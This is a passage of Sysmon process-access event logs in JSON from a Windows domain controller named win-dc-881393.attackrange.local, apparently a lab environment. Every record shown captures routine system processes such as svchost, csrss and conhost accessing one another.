\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010E51E0600}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010E51E0600}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-02E2-5F25-0000-0010E51E0600}\r\nSourceProcessId: 4848\r\nSourceThreadId: 4892\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010641E0600}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-02E2-5F25-0000-0010E51E0600}","SourceProcessId":"4848","SourceThreadId":"4892","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010641E0600}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4165,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.527\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010641E0600}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.527","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010641E0600}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4166,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.589\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2216\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-02E2-5F25-0000-0010641E0600}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.589","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2216","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-02E2-5F25-0000-0010641E0600}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4167,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 